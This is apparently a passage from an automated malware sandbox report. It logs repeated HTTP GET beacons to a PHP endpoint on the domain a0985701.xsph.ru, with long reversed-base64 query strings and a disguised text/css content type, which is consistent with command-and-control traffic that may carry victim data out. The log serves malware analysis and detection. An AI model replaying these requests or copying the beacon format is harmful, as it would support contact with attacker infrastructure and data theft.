IWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: 